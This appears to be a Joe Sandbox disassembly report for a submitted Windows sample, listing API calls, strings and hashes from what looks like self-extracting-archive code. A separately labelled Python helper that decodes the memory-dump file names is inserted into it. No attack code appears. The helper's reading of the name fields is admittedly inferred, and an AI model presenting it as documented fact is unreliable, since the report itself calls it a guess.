control_flow_graph 272 a31b83-a31ba6 call a3ffd0 GetModuleHandleW 275 a31c07-a31e68 272->275 276 a31ba8-a31bbf GetProcAddress 272->276 277 a31f34-a31f60 GetModuleFileNameW call a2d6a7 call a3192f 275->277 278 a31e6e-a31e79 call a489ee 275->278 279 a31bc1-a31bd7 276->279 280 a31bd9-a31be9 GetProcAddress 276->280 294 a31f62-a31f6e call a2c619 277->294 278->277 289 a31e7f-a31ead GetModuleFileNameW CreateFileW 278->289 279->280 282 a31c05 280->282 283 a31beb-a31c00 280->283 282->275 283->282 292 a31f28-a31f2f CloseHandle 289->292 293 a31eaf-a31ebb SetFilePointer 289->293 292->277 293->292 295 a31ebd-a31ed9 ReadFile 293->295 301 a31f70-a31f7b call a31b3b 294->301 302 a31f9d-a31fc4 call a2d71d GetFileAttributesW 294->302 295->292 298 a31edb-a31f00 295->298 300 a31f1d-a31f26 call a3169e 298->300 300->292 309 a31f02-a31f1c call a31b3b 300->309 301->302 311 a31f7d-a31f9b CompareStringW 301->311 312 a31fc6-a31fca 302->312 313 a31fce 302->313 309->300 311->302 311->312 312->294 316 a31fcc 312->316 314 a31fd0-a31fd5 313->314 317 a31fd7 314->317 318 a3200c-a3200e 314->318 316->314 319 a31fd9-a32000 call a2d71d GetFileAttributesW 317->319 320 a32014-a3202b call a2d6f1 call a2c619 318->320 321 a3211b-a32125 318->321 326 a32002-a32006 319->326 327 a3200a 319->327 331 a32093-a320c6 call a24a20 AllocConsole 320->331 332 a3202d-a3208e call a31b3b * 2 call a2f937 call a24a20 call a2f937 call a3b7f4 320->332 326->319 329 a32008 326->329 327->318 329->318 338 a32113-a32115 ExitProcess 331->338 339 a320c8-a3210d GetCurrentProcessId AttachConsole call a44fa3 GetStdHandle WriteConsoleW Sleep FreeConsole 331->339 332->338 339->338
APIs
• GetModuleHandleW.KERNEL32(kernel32), ref: 00A31B9C
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A31BAE
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A31BDF
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A31E89
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A31EA3
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A31EB3
• ReadFile.KERNEL32(00000000,?,00007FFE,00A54D24,00000000), ref: 00A31ED1
• CloseHandle.KERNEL32(00000000), ref: 00A31F29
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A31F3E
• CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00A54D24,?,00000000,?,00000800), ref: 00A31F92
• GetFileAttributesW.KERNELBASE(?,?,00A54D24,00000800,?,00000000,?,00000800), ref: 00A31FBC
• GetFileAttributesW.KERNEL32(?,?,00A54DEC,00000800), ref: 00A31FF8
  • Part of subcall function 00A31B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A31B56
  • Part of subcall function 00A31B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3063A,Crypt32.dll,00000000,00A306B4,00000200,?,00A30697,00000000,00000000,?), ref: 00A31B78
• _swprintf.LIBCMT ref: 00A3206A
• _swprintf.LIBCMT ref: 00A320B6
  • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
• AllocConsole.KERNEL32 ref: 00A320BE
• GetCurrentProcessId.KERNEL32 ref: 00A320C8
• AttachConsole.KERNEL32(00000000), ref: 00A320CF
• _wcslen.LIBCMT ref: 00A320E4
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00A320F5
• WriteConsoleW.KERNEL32(00000000), ref: 00A320FC
• Sleep.KERNEL32(00002710), ref: 00A32107
• FreeConsole.KERNEL32 ref: 00A3210D
• ExitProcess.KERNEL32 ref: 00A32115
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
• String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
• API String ID: 1207345701-3298887752
• Opcode ID: f26d0fdc00d6d9cb054c57cdc9874f097e5091f70b28b1148683a6ded9fd1bf5
• Instruction ID: ebe2bbaa87a3a3c68d4488d060965aa91703230180af81cf404bc8bdb764e2bc
• Opcode Fuzzy Hash: f26d0fdc00d6d9cb054c57cdc9874f097e5091f70b28b1148683a6ded9fd1bf5
• Instruction Fuzzy Hash: 92D185B1408744AFD330DFA0D859BDFBBE8BB8870AF50091DFA8596190DBB4858DCB52
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00A2ED90
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A2EDCC
  • Part of subcall function 00A2D6A7: _wcslen.LIBCMT ref: 00A2D6AF
  • Part of subcall function 00A31907: _wcslen.LIBCMT ref: 00A3190D
  • Part of subcall function 00A32ED2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A2CF18,00000000,?,?), ref: 00A32EEE
• _wcslen.LIBCMT ref: 00A2F109
• __fprintf_l.LIBCMT ref: 00A2F23C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
• String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
• API String ID: 566448164-801612888
• Opcode ID: 5d0e8339497ad167be30f3eafc6f45c93f7eb08558b834ed6d293fc2571b65f4
• Instruction ID: 8c553c016654f0f4e21dafa645ef72068f1cdd134ebad47ac5137b29b44a42d4
• Opcode Fuzzy Hash: 5d0e8339497ad167be30f3eafc6f45c93f7eb08558b834ed6d293fc2571b65f4
• Instruction Fuzzy Hash: 8232CE71900228AFDF24EF68E941AEE77B4FF48704F40457AFA069B291E7719D85CB50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00A3C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A3C769
  • Part of subcall function 00A3C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3C77A
  • Part of subcall function 00A3C758: IsDialogMessageW.USER32(0001046C,?), ref: 00A3C78E
  • Part of subcall function 00A3C758: TranslateMessage.USER32(?), ref: 00A3C79C
  • Part of subcall function 00A3C758: DispatchMessageW.USER32(?), ref: 00A3C7A6
• GetDlgItem.USER32(00000068,00A81CF0), ref: 00A3E62D
• ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,00A3C9A9,00A560F0,00A81CF0,00A81CF0,00001000,?,00000000,?), ref: 00A3E655
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A3E660
• SendMessageW.USER32(00000000,000000C2,00000000,00A545F4), ref: 00A3E66E
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A3E684
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A3E69E
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A3E6E2
• SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A3E6F0
• SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A3E6FF
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A3E726
• SendMessageW.USER32(00000000,000000C2,00000000,00A5549C), ref: 00A3E735
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
• String ID: \
• API String ID: 3569833718-2967466578
Control-flow Graph
APIs
• _wcslen.LIBCMT ref: 00A3E8FE
• ShellExecuteExW.SHELL32(?), ref: 00A3EA2E
• IsWindowVisible.USER32(?), ref: 00A3EA61
• ShowWindow.USER32(?,00000000), ref: 00A3EA6D
• WaitForInputIdle.USER32(?,000007D0), ref: 00A3EA7E
• GetExitCodeProcess.KERNEL32(?,?), ref: 00A3EAA9
• CloseHandle.KERNEL32(?), ref: 00A3EACF
• ShowWindow.USER32(?,00000001), ref: 00A3EB31
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
• String ID: .exe$.inf
• API String ID: 3646668279-3750412487
Control-flow Graph
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A469A3,00A469A3,?,?,?,00A4BD6C,00000001,00000001,62E85006), ref: 00A4BB75
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A4BD6C,00000001,00000001,62E85006,?,?,?), ref: 00A4BBFB
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A4BCF5
• __freea.LIBCMT ref: 00A4BD02
  • Part of subcall function 00A4A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A4DBEC,00000000,?,00A480B1,?,00000008,?,00A4A871,?,?,?), ref: 00A4A830
• __freea.LIBCMT ref: 00A4BD0B
• __freea.LIBCMT ref: 00A4BD30
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32(00020008,00A3BF14,?,?,?,?,00A3BF14,?), ref: 00A3C333
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00A3BF14,?), ref: 00A3C33A
• GetTokenInformation.KERNELBASE(00A3BF14,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,00A3BF14,?), ref: 00A3C354
• GetLastError.KERNEL32(?,?,?,?,00A3BF14,?), ref: 00A3C35E
• GetTokenInformation.KERNELBASE(00A3BF14,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,00A3BF14,?), ref: 00A3C382
• CopySid.ADVAPI32(00000044,00A3BF14,00000000,?,?,?,?,?,00A3BF14,?), ref: 00A3C393
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Token$InformationProcess$CopyCurrentErrorLastOpen
• String ID:
• API String ID: 3984476752-0
Control-flow Graph
APIs
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A3ED97
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A3EDB1
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3EDC2
• TranslateMessage.USER32(?), ref: 00A3EDCC
• DispatchMessageW.USER32(?), ref: 00A3EDD6
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A3EDE1
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Message$ObjectSingleWait$DispatchPeekTranslate
• String ID:
• API String ID: 2148572870-0
Control-flow Graph
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00A3DFE2
                                                                                                • Part of subcall function 00A2CAA0: _wcslen.LIBCMT ref: 00A2CAA6
                                                                                              • _swprintf.LIBCMT ref: 00A3E016
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00A72892), ref: 00A3E036
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A3E143
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 110358324-1360425832
                                                                                              • Opcode ID: 897b5d76a342555841df8d25dae65f301cb2c89f75ed6dd6946cc9650bda3866
                                                                                              • Instruction ID: 3c1697ebb3b3ed26653023f46546d7dea228e89f70c711654c252f808cc81811
                                                                                              • Opcode Fuzzy Hash: 897b5d76a342555841df8d25dae65f301cb2c89f75ed6dd6946cc9650bda3866
                                                                                              • Instruction Fuzzy Hash: 22416F71940218AADF25DBA0DD45FEA77FCEB04305F4084A6F909A7091EF719A85CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
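The "Memory Dump Source" entries repeated under every function above name the memory regions the disassembly was taken from. The following decoder is an added example and is not part of the Joe Sandbox report: it parses those dump names, decodes the two fields that match Windows MEMORY_BASIC_INFORMATION constants exactly on this page (the 5th field as Protect, e.g. 0x20 = PAGE_EXECUTE_READ at 0xA21000, and the 7th as Type, 0x01000000 = MEM_IMAGE), and flags any region that is both writable and executable, which is the thing an analyst wants to see first when deciding whether an image section was unpacked in place. The field layout is an assumption inferred from the values on the page, not documented by the report; the remaining fields are carried as opaque strings.

```python
# Added example (not Joe Sandbox code): decode memory dump source names of the
# form <f0>.<f1>.<f2>.<base>.<protect>.<f5>.<type>.<f7>.sdmp as listed in this
# report. ASSUMPTION: field 4 is the region base address, field 5 is
# MEMORY_BASIC_INFORMATION.Protect and field 7 is .Type; this matches every
# value on the page but is inferred, not taken from Joe Sandbox documentation.
import re
from dataclasses import dataclass

# Windows page protection constants from winnt.h (base values, modifiers masked off).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Windows region type constants from winnt.h.
MEM_TYPE = {0x01000000: "MEM_IMAGE", 0x00040000: "MEM_MAPPED", 0x00020000: "MEM_PRIVATE"}

_SDMP_RE = re.compile(
    r"^(?P<f0>[0-9A-Fa-f]{8})\.(?P<f1>[0-9A-Fa-f]{8})\.(?P<f2>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f5>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:08X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:08X}")

    @property
    def executable(self) -> bool:
        # All PAGE_EXECUTE* values live in the 0x10..0x80 nibble.
        return (self.protect & 0xF0) != 0

    @property
    def writable(self) -> bool:
        return (self.protect & 0xFF) in (0x04, 0x08, 0x40, 0x80)


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse one dump name; tolerates the 'Download File' link text the HTML export appends."""
    name = name.replace("Download File", "").strip()
    m = _SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox memory dump name: {name!r}")
    return DumpRegion(name=name, base=int(m["base"], 16),
                      protect=int(m["protect"], 16), mem_type=int(m["type"], 16))


def module_layout(names):
    """Regions sorted by base address as (base, protection, type, is_rwx) tuples."""
    regions = sorted((parse_sdmp_name(n) for n in names), key=lambda r: r.base)
    return [(r.base, r.protect_name, r.type_name, r.executable and r.writable) for r in regions]


def rwx_regions(names):
    """Names of regions that are both writable and executable: in an image mapping
    this usually means a section was unpacked or patched in place."""
    return [r.name for r in map(parse_sdmp_name, names) if r.executable and r.writable]


# The seven dump names from this report's 'Memory Dump Source' entries (copied from the page).
REPORT_SOURCES = [
    "00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for base, prot, typ, rwx in module_layout(REPORT_SOURCES):
        print(f"{base:#010x}  {prot:<22} {typ:<11} {'RWX' if rwx else ''}")
```

Run against the names on this page, the layout is a plain PE image at 0xA20000: read-only headers, one PAGE_EXECUTE_READ code region at 0xA21000 (the "Source File" every function above is disassembled from), read-only and read-write data regions, and no writable-and-executable region, so nothing in these dumps suggests the code was unpacked in place.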

                                                                                              APIs
                                                                                                • Part of subcall function 00A31B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A31B56
                                                                                                • Part of subcall function 00A31B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3063A,Crypt32.dll,00000000,00A306B4,00000200,?,00A30697,00000000,00000000,?), ref: 00A31B78
                                                                                              • OleInitialize.OLE32(00000000), ref: 00A3BD34
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A3BD6B
                                                                                              • SHGetMalloc.SHELL32(00A6A460), ref: 00A3BD75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll$3To
                                                                                              • API String ID: 3498096277-2168385784
                                                                                              • Opcode ID: efc21cfeef71336d3ef84e6adb48488f3fb9421442d42bc58ccb705e3890494d
                                                                                              • Instruction ID: ff09d5b635d3c58171374934965b0ecb4c862c8286d2444c78ce9e13aaff669c
                                                                                              • Opcode Fuzzy Hash: efc21cfeef71336d3ef84e6adb48488f3fb9421442d42bc58ccb705e3890494d
                                                                                              • Instruction Fuzzy Hash: C8F049B1C00209AFCB10AFA9C8499EFFBFCEF80304F00441AF804A2200DBB456468BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              Control-flow graph (rendered interactively in the original report), basic blocks 00A2AB40-00A2AC99: after two helper calls (00A3FFD0, 00A279E5) the function calls CreateFileW in block 00A2ABAB-00A2ABCA; on failure it calls GetLastError and helper 00A2CF32 and, depending on that result, retries CreateFileW once in block 00A2ABF0-00A2AC13 (GetLastError again); the success path reaches SetFileTime in block 00A2AC45-00A2AC59 before the cleanup blocks. In the CreateFileW calls listed below, dwCreationDisposition 3 is OPEN_EXISTING and dwFlagsAndAttributes 0x08000000 is FILE_FLAG_SEQUENTIAL_SCAN.
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00A28243,?,00000005,?,00000011), ref: 00A2ABBF
                                                                                              • GetLastError.KERNEL32(?,?,00A28243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A2ABCC
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00A28243,?,00000005,?), ref: 00A2AC02
                                                                                              • GetLastError.KERNEL32(?,?,00A28243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A2AC0A
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00A28243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A2AC59
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 4befb2b06ad74e390afe428eed88b2446fe418b5dce3e7d35f83267560a3106f
                                                                                              • Instruction ID: 1aab2e0cf91e1bc0f4b03a7f1f9a2bf9893de1bed283e91902cb96e03d65e662
                                                                                              • Opcode Fuzzy Hash: 4befb2b06ad74e390afe428eed88b2446fe418b5dce3e7d35f83267560a3106f
                                                                                              • Instruction Fuzzy Hash: 31318A305447916FE330DF68ED45BDABBE4BB15324F200B29F9A1921D1C3B4A885CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              Control-flow graph (rendered interactively in the original report), basic blocks 00A3C758-00A3C7AE: a non-blocking message pump. PeekMessageW checks for a pending message; if one is queued, GetMessageW retrieves it, IsDialogMessageW offers it to the dialog, and anything the dialog does not consume goes through TranslateMessage and DispatchMessageW.
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A3C769
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3C77A
                                                                                              • IsDialogMessageW.USER32(0001046C,?), ref: 00A3C78E
                                                                                              • TranslateMessage.USER32(?), ref: 00A3C79C
                                                                                              • DispatchMessageW.USER32(?), ref: 00A3C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: da1f786080e6e67e7a7781171461e6e140ed8650395d415584951bee341ad1c8
                                                                                              • Instruction ID: 99f449870df49d5504a18531e7211a873e8b8d9ecb50f645c66aa65739c5fb27
                                                                                              • Opcode Fuzzy Hash: da1f786080e6e67e7a7781171461e6e140ed8650395d415584951bee341ad1c8
                                                                                              • Instruction Fuzzy Hash: AAF0A975D01519AACB20EBF6AC4CDDB7EBCEE05761B404415B906E2150E764D506CBE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              Control-flow graph (rendered interactively in the original report), basic blocks 00A3BBC0-00A3BC16: GetClassNameW reads the window class; if the class-name comparison in helper 00A33316 (CompareStringW) matches, FindWindowExW locates the child "EDIT" control, after which SHAutoComplete is enabled on it with flag 0x10, which is SHACF_FILESYS_ONLY (file-system path autocompletion in an edit box).
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00A3BBD7
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A3BC0E
                                                                                                • Part of subcall function 00A33316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00A2D523,00000000,.exe,?,?,00000800,?,?,?,00A39E5C), ref: 00A3332C
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A3BBFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
